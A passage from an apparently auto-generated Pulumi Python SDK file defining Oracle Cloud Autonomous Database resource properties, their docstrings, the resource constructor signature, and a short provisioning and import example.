pulumi.set(self, "customer_contacts", value)
@property
@pulumi.getter(name="dataSafeStatus")
def data_safe_status(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Status of the Data Safe registration for this Autonomous Database. Could be REGISTERED or NOT_REGISTERED.
"""
return pulumi.get(self, "data_safe_status")
@data_safe_status.setter
def data_safe_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_safe_status", value)
@property
@pulumi.getter(name="dataStorageSizeInGb")
def data_storage_size_in_gb(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The size, in gigabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. The maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "data_storage_size_in_gb")
@data_storage_size_in_gb.setter
def data_storage_size_in_gb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_storage_size_in_gb", value)
@property
@pulumi.getter(name="dataStorageSizeInTbs")
def data_storage_size_in_tbs(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The size, in terabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. For Autonomous Databases on dedicated Exadata infrastructure, the maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "data_storage_size_in_tbs")
@data_storage_size_in_tbs.setter
def data_storage_size_in_tbs(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_storage_size_in_tbs", value)
@property
@pulumi.getter(name="dbName")
def db_name(self) -> Optional[pulumi.Input[str]]:
"""
The database name. The name must begin with an alphabetic character and can contain a maximum of 14 alphanumeric characters. Special characters are not permitted. The database name must be unique in the tenancy.
"""
return pulumi.get(self, "db_name")
@db_name.setter
def db_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "db_name", value)
@property
@pulumi.getter(name="dbVersion")
def db_version(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A valid Oracle Database version for Autonomous Database. The `db_workload` values AJD and APEX are only supported for `db_version` `19c` and above.
"""
return pulumi.get(self, "db_version")
@db_version.setter
def db_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "db_version", value)
@property
@pulumi.getter(name="dbWorkload")
def db_workload(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The Autonomous Database workload type. The following values are valid:
* OLTP - indicates an Autonomous Transaction Processing database
* DW - indicates an Autonomous Data Warehouse database
* AJD - indicates an Autonomous JSON Database
* APEX - indicates an Autonomous Database with the Oracle APEX Application Development workload type. Note: `db_workload` can only be updated from AJD to OLTP or from a free OLTP to AJD.
"""
return pulumi.get(self, "db_workload")
@db_workload.setter
def db_workload(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "db_workload", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The user-friendly name for the Autonomous Database. The name does not have to be unique.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="failedDataRecoveryInSeconds")
def failed_data_recovery_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
Indicates the number of seconds of data loss for a Data Guard failover.
"""
return pulumi.get(self, "failed_data_recovery_in_seconds")
@failed_data_recovery_in_seconds.setter
def failed_data_recovery_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "failed_data_recovery_in_seconds", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="infrastructureType")
def infrastructure_type(self) -> Optional[pulumi.Input[str]]:
"""
The infrastructure type this resource belongs to.
"""
return pulumi.get(self, "infrastructure_type")
@infrastructure_type.setter
def infrastructure_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "infrastructure_type", value)
@property
@pulumi.getter(name="isAccessControlEnabled")
def is_access_control_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates if database-level access control is enabled. If disabled, database access is defined by the network security rules. If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While specifying `whitelistedIps` rules is optional, if database-level access control is enabled and no rules are specified, the database becomes inaccessible. The rules can be added later using the `UpdateAutonomousDatabase` API operation or the edit option in the console. When creating a database clone, the desired access control setting should be specified. By default, database-level access control is disabled for the clone.
"""
return pulumi.get(self, "is_access_control_enabled")
@is_access_control_enabled.setter
def is_access_control_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_access_control_enabled", value)
@property
@pulumi.getter(name="isAutoScalingEnabled")
def is_auto_scaling_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates if auto scaling is enabled for the Autonomous Database OCPU core count. The default value is `FALSE`.
"""
return pulumi.get(self, "is_auto_scaling_enabled")
@is_auto_scaling_enabled.setter
def is_auto_scaling_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_auto_scaling_enabled", value)
@property
@pulumi.getter(name="isDataGuardEnabled")
def is_data_guard_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates whether the Autonomous Database has Data Guard enabled.
"""
return pulumi.get(self, "is_data_guard_enabled")
@is_data_guard_enabled.setter
def is_data_guard_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_data_guard_enabled", value)
@property
@pulumi.getter(name="isDedicated")
def is_dedicated(self) -> Optional[pulumi.Input[bool]]:
"""
True if the database is on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm).
"""
return pulumi.get(self, "is_dedicated")
@is_dedicated.setter
def is_dedicated(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_dedicated", value)
@property
@pulumi.getter(name="isFreeTier")
def is_free_tier(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of memory. For Always Free databases, memory and CPU cannot be scaled. When `db_workload` is `AJD` or `APEX`, this cannot be `true`.
"""
return pulumi.get(self, "is_free_tier")
@is_free_tier.setter
def is_free_tier(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_free_tier", value)
@property
@pulumi.getter(name="isPreview")
def is_preview(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates if the Autonomous Database version is a preview version.
"""
return pulumi.get(self, "is_preview")
@is_preview.setter
def is_preview(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_preview", value)
@property
@pulumi.getter(name="isPreviewVersionWithServiceTermsAccepted")
def is_preview_version_with_service_terms_accepted(self) -> Optional[pulumi.Input[bool]]:
"""
If set to `TRUE`, indicates that an Autonomous Database preview version is being provisioned, and that the preview version's terms of service have been accepted. Note that preview version software is only available for databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI).
"""
return pulumi.get(self, "is_preview_version_with_service_terms_accepted")
@is_preview_version_with_service_terms_accepted.setter
def is_preview_version_with_service_terms_accepted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_preview_version_with_service_terms_accepted", value)
@property
@pulumi.getter(name="isRefreshableClone")
def is_refreshable_clone(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) True to create a refreshable clone; false to detach the clone from its source Autonomous Database. Detaching is a one-time operation, after which the clone becomes a regular Autonomous Database.
"""
return pulumi.get(self, "is_refreshable_clone")
@is_refreshable_clone.setter
def is_refreshable_clone(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_refreshable_clone", value)
@property
@pulumi.getter(name="keyHistoryEntries")
def key_history_entries(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseKeyHistoryEntryArgs']]]]:
"""
Key History Entry.
"""
return pulumi.get(self, "key_history_entries")
@key_history_entries.setter
def key_history_entries(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseKeyHistoryEntryArgs']]]]):
pulumi.set(self, "key_history_entries", value)
@property
@pulumi.getter(name="keyStoreId")
def key_store_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the key store.
"""
return pulumi.get(self, "key_store_id")
@key_store_id.setter
def key_store_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_store_id", value)
@property
@pulumi.getter(name="keyStoreWalletName")
def key_store_wallet_name(self) -> Optional[pulumi.Input[str]]:
"""
The wallet name for Oracle Key Vault.
"""
return pulumi.get(self, "key_store_wallet_name")
@key_store_wallet_name.setter
def key_store_wallet_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_store_wallet_name", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.
"""
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter(name="kmsKeyLifecycleDetails")
def kms_key_lifecycle_details(self) -> Optional[pulumi.Input[str]]:
"""
KMS key lifecycle details.
"""
return pulumi.get(self, "kms_key_lifecycle_details")
@kms_key_lifecycle_details.setter
def kms_key_lifecycle_details(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_lifecycle_details", value)
@property
@pulumi.getter(name="licenseModel")
def license_model(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud. License Included allows you to subscribe to new Oracle Database software licenses and the Database service. Note that when provisioning an Autonomous Database on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute is already set at the Autonomous Exadata Infrastructure level. When using [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system defaults to `BRING_YOUR_OWN_LICENSE`. This field is required when `db_workload` is AJD and must be set to `LICENSE_INCLUDED`, because AJD does not support the default `license_model` value `BRING_YOUR_OWN_LICENSE`.
"""
return pulumi.get(self, "license_model")
@license_model.setter
def license_model(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "license_model", value)
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> Optional[pulumi.Input[str]]:
"""
Additional information about the current lifecycle state.
"""
return pulumi.get(self, "lifecycle_details")
@lifecycle_details.setter
def lifecycle_details(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_details", value)
@property
@pulumi.getter(name="nsgIds")
def nsg_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) A list of the [OCIDs](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about NSGs, see [Security Rules](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/securityrules.htm). **NsgIds restrictions:**
* Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.
"""
return pulumi.get(self, "nsg_ids")
@nsg_ids.setter
def nsg_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "nsg_ids", value)
@property
@pulumi.getter(name="ocpuCount")
def ocpu_count(self) -> Optional[pulumi.Input[float]]:
"""
(Updatable) The number of OCPU cores to be made available to the database.
"""
return pulumi.get(self, "ocpu_count")
@ocpu_count.setter
def ocpu_count(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "ocpu_count", value)
@property
@pulumi.getter(name="openMode")
def open_mode(self) -> Optional[pulumi.Input[str]]:
"""
The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.
"""
return pulumi.get(self, "open_mode")
@open_mode.setter
def open_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "open_mode", value)
@property
@pulumi.getter(name="operationsInsightsStatus")
def operations_insights_status(self) -> Optional[pulumi.Input[str]]:
"""
Status of Operations Insights for this Autonomous Database.
"""
return pulumi.get(self, "operations_insights_status")
@operations_insights_status.setter
def operations_insights_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operations_insights_status", value)
@property
@pulumi.getter(name="permissionLevel")
def permission_level(self) -> Optional[pulumi.Input[str]]:
"""
The Autonomous Database permission level. Restricted mode allows access only to admin users.
"""
return pulumi.get(self, "permission_level")
@permission_level.setter
def permission_level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permission_level", value)
@property
@pulumi.getter(name="privateEndpoint")
def private_endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The private endpoint for the resource.
"""
return pulumi.get(self, "private_endpoint")
@private_endpoint.setter
def private_endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_endpoint", value)
@property
@pulumi.getter(name="privateEndpointIp")
def private_endpoint_ip(self) -> Optional[pulumi.Input[str]]:
"""
The private endpoint IP address for the resource.
"""
return pulumi.get(self, "private_endpoint_ip")
@private_endpoint_ip.setter
def private_endpoint_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_endpoint_ip", value)
@property
@pulumi.getter(name="privateEndpointLabel")
def private_endpoint_label(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The private endpoint label for the resource.
"""
return pulumi.get(self, "private_endpoint_label")
@private_endpoint_label.setter
def private_endpoint_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_endpoint_label", value)
@property
@pulumi.getter(name="refreshableMode")
def refreshable_mode(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous Database.
"""
return pulumi.get(self, "refreshable_mode")
@refreshable_mode.setter
def refreshable_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "refreshable_mode", value)
@property
@pulumi.getter(name="refreshableStatus")
def refreshable_status(self) -> Optional[pulumi.Input[str]]:
"""
The refresh status of the clone. REFRESHING indicates that the clone is currently being refreshed with data from the source Autonomous Database.
"""
return pulumi.get(self, "refreshable_status")
@refreshable_status.setter
def refreshable_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "refreshable_status", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The Data Guard role of the Autonomous Database, if Autonomous Data Guard is enabled.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter(name="rotateKeyTrigger")
def rotate_key_trigger(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) An optional property that, when flipped, triggers rotation of the KMS key. It is applicable only to dedicated databases, i.e. where `is_dedicated` is true.
"""
return pulumi.get(self, "rotate_key_trigger")
@rotate_key_trigger.setter
def rotate_key_trigger(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "rotate_key_trigger", value)
@property
@pulumi.getter(name="serviceConsoleUrl")
def service_console_url(self) -> Optional[pulumi.Input[str]]:
"""
The URL of the Service Console for the Autonomous Database.
"""
return pulumi.get(self, "service_console_url")
@service_console_url.setter
def service_console_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_console_url", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
The source of the database: Use `NONE` for creating a new Autonomous Database. Use `DATABASE` for creating a new Autonomous Database by cloning an existing Autonomous Database.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter(name="sourceId")
def source_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "source_id")
@source_id.setter
def source_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_id", value)
@property
@pulumi.getter(name="standbyDb")
def standby_db(self) -> Optional[pulumi.Input['AutonomousDatabaseStandbyDbArgs']]:
"""
Autonomous Data Guard standby database details.
"""
return pulumi.get(self, "standby_db")
@standby_db.setter
def standby_db(self, value: Optional[pulumi.Input['AutonomousDatabaseStandbyDbArgs']]):
pulumi.set(self, "standby_db", value)
@property
@pulumi.getter(name="standbyWhitelistedIps")
def standby_whitelisted_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
return pulumi.get(self, "standby_whitelisted_ips")
@standby_whitelisted_ips.setter
def standby_whitelisted_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "standby_whitelisted_ips", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The current state of the Autonomous Database. Can be set to `AVAILABLE` or `STOPPED`.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="switchoverTo")
def switchover_to(self) -> Optional[pulumi.Input[str]]:
"""
It is applicable only when `is_data_guard_enabled` is true. Could be set to `PRIMARY` or `STANDBY`. Default value is `PRIMARY`.
"""
return pulumi.get(self, "switchover_to")
@switchover_to.setter
def switchover_to(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "switchover_to", value)
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
System tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "system_tags")
@system_tags.setter
def system_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "system_tags", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
The date and time the Autonomous Database was created.
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="timeDeletionOfFreeAutonomousDatabase")
def time_deletion_of_free_autonomous_database(self) -> Optional[pulumi.Input[str]]:
"""
The date and time the Always Free database will be automatically deleted because of inactivity. If the database is in the STOPPED state and without activity until this time, it will be deleted.
"""
return pulumi.get(self, "time_deletion_of_free_autonomous_database")
@time_deletion_of_free_autonomous_database.setter
def time_deletion_of_free_autonomous_database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_deletion_of_free_autonomous_database", value)
@property
@pulumi.getter(name="timeMaintenanceBegin")
def time_maintenance_begin(self) -> Optional[pulumi.Input[str]]:
"""
The date and time when maintenance will begin.
"""
return pulumi.get(self, "time_maintenance_begin")
@time_maintenance_begin.setter
def time_maintenance_begin(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_maintenance_begin", value)
@property
@pulumi.getter(name="timeMaintenanceEnd")
def time_maintenance_end(self) -> Optional[pulumi.Input[str]]:
"""
The date and time when maintenance will end.
"""
return pulumi.get(self, "time_maintenance_end")
@time_maintenance_end.setter
def time_maintenance_end(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_maintenance_end", value)
@property
@pulumi.getter(name="timeOfLastFailover")
def time_of_last_failover(self) -> Optional[pulumi.Input[str]]:
"""
The timestamp of the last failover operation.
"""
return pulumi.get(self, "time_of_last_failover")
@time_of_last_failover.setter
def time_of_last_failover(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_of_last_failover", value)
@property
@pulumi.getter(name="timeOfLastRefresh")
def time_of_last_refresh(self) -> Optional[pulumi.Input[str]]:
"""
The date and time of the last refresh.
"""
return pulumi.get(self, "time_of_last_refresh")
@time_of_last_refresh.setter
def time_of_last_refresh(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_of_last_refresh", value)
@property
@pulumi.getter(name="timeOfLastRefreshPoint")
def time_of_last_refresh_point(self) -> Optional[pulumi.Input[str]]:
"""
The refresh point timestamp (UTC). The refresh point is the time to which the database was most recently refreshed. Data created after the refresh point is not included in the refresh.
"""
return pulumi.get(self, "time_of_last_refresh_point")
@time_of_last_refresh_point.setter
def time_of_last_refresh_point(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_of_last_refresh_point", value)
@property
@pulumi.getter(name="timeOfLastSwitchover")
def time_of_last_switchover(self) -> Optional[pulumi.Input[str]]:
"""
The timestamp of the last switchover operation for the Autonomous Database.
"""
return pulumi.get(self, "time_of_last_switchover")
@time_of_last_switchover.setter
def time_of_last_switchover(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_of_last_switchover", value)
@property
@pulumi.getter(name="timeOfNextRefresh")
def time_of_next_refresh(self) -> Optional[pulumi.Input[str]]:
"""
The date and time of the next refresh.
"""
return pulumi.get(self, "time_of_next_refresh")
@time_of_next_refresh.setter
def time_of_next_refresh(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_of_next_refresh", value)
@property
@pulumi.getter(name="timeReclamationOfFreeAutonomousDatabase")
def time_reclamation_of_free_autonomous_database(self) -> Optional[pulumi.Input[str]]:
"""
The date and time the Always Free database will be stopped because of inactivity. If this time is reached without any database activity, the database will automatically be put into the STOPPED state.
"""
return pulumi.get(self, "time_reclamation_of_free_autonomous_database")
@time_reclamation_of_free_autonomous_database.setter
def time_reclamation_of_free_autonomous_database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_reclamation_of_free_autonomous_database", value)
@property
@pulumi.getter
def timestamp(self) -> Optional[pulumi.Input[str]]:
"""
The timestamp specified for the point-in-time clone of the source Autonomous Database. The timestamp must be in the past.
"""
return pulumi.get(self, "timestamp")
@timestamp.setter
def timestamp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "timestamp", value)
@property
@pulumi.getter(name="usedDataStorageSizeInTbs")
def used_data_storage_size_in_tbs(self) -> Optional[pulumi.Input[int]]:
"""
The amount of storage that has been used, in terabytes.
"""
return pulumi.get(self, "used_data_storage_size_in_tbs")
@used_data_storage_size_in_tbs.setter
def used_data_storage_size_in_tbs(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "used_data_storage_size_in_tbs", value)
@property
@pulumi.getter(name="vaultId")
def vault_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the Oracle Cloud Infrastructure [vault](https://docs.cloud.oracle.com/iaas/Content/KeyManagement/Concepts/keyoverview.htm#concepts).
"""
return pulumi.get(self, "vault_id")
@vault_id.setter
def vault_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vault_id", value)
@property
@pulumi.getter(name="whitelistedIps")
def whitelisted_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
return pulumi.get(self, "whitelisted_ips")
@whitelisted_ips.setter
def whitelisted_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "whitelisted_ips", value)
class AutonomousDatabase(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_password: Optional[pulumi.Input[str]] = None,
are_primary_whitelisted_ips_used: Optional[pulumi.Input[bool]] = None,
autonomous_container_database_id: Optional[pulumi.Input[str]] = None,
autonomous_database_backup_id: Optional[pulumi.Input[str]] = None,
autonomous_database_id: Optional[pulumi.Input[str]] = None,
autonomous_maintenance_schedule_type: Optional[pulumi.Input[str]] = None,
clone_type: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
customer_contacts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AutonomousDatabaseCustomerContactArgs']]]]] = None,
data_safe_status: Optional[pulumi.Input[str]] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
data_storage_size_in_tbs: Optional[pulumi.Input[int]] = None,
db_name: Optional[pulumi.Input[str]] = None,
db_version: Optional[pulumi.Input[str]] = None,
db_workload: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_access_control_enabled: Optional[pulumi.Input[bool]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_data_guard_enabled: Optional[pulumi.Input[bool]] = None,
is_dedicated: Optional[pulumi.Input[bool]] = None,
is_free_tier: Optional[pulumi.Input[bool]] = None,
is_preview_version_with_service_terms_accepted: Optional[pulumi.Input[bool]] = None,
is_refreshable_clone: Optional[pulumi.Input[bool]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
license_model: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ocpu_count: Optional[pulumi.Input[float]] = None,
open_mode: Optional[pulumi.Input[str]] = None,
operations_insights_status: Optional[pulumi.Input[str]] = None,
permission_level: Optional[pulumi.Input[str]] = None,
private_endpoint_label: Optional[pulumi.Input[str]] = None,
refreshable_mode: Optional[pulumi.Input[str]] = None,
rotate_key_trigger: Optional[pulumi.Input[bool]] = None,
source: Optional[pulumi.Input[str]] = None,
source_id: Optional[pulumi.Input[str]] = None,
standby_whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
switchover_to: Optional[pulumi.Input[str]] = None,
timestamp: Optional[pulumi.Input[str]] = None,
vault_id: Optional[pulumi.Input[str]] = None,
whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
This resource provides the Autonomous Database resource in Oracle Cloud Infrastructure Database service.
Creates a new Autonomous Database.
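## Example Usage
A minimal sketch of provisioning a serverless Autonomous Database; the compartment OCID and admin password come from stack configuration, and all names and values shown are illustrative placeholders:
```python
import pulumi
import pulumi_oci as oci

config = pulumi.Config()
compartment_id = config.require("compartmentOcid")      # placeholder compartment OCID
admin_password = config.require_secret("adbPassword")   # must satisfy the password rules below

test_autonomous_database = oci.database.AutonomousDatabase("testAutonomousDatabase",
    compartment_id=compartment_id,
    db_name="adbdemo",
    db_workload="OLTP",
    cpu_core_count=1,
    data_storage_size_in_tbs=1,
    admin_password=admin_password,
    license_model="LICENSE_INCLUDED",
    is_auto_scaling_enabled=True)
```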
## Import
AutonomousDatabases can be imported using the `id`, e.g.
```sh
$ pulumi import oci:database/autonomousDatabase:AutonomousDatabase test_autonomous_database "id"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] admin_password: (Updatable) The password must be between 12 and 30 characters long, and must contain at least 1 uppercase, 1 lowercase, and 1 numeric character. It cannot contain the double quote symbol (") or the username "admin", regardless of casing. The password is mandatory if source value is "BACKUP_FROM_ID", "BACKUP_FROM_TIMESTAMP", "DATABASE" or "NONE".
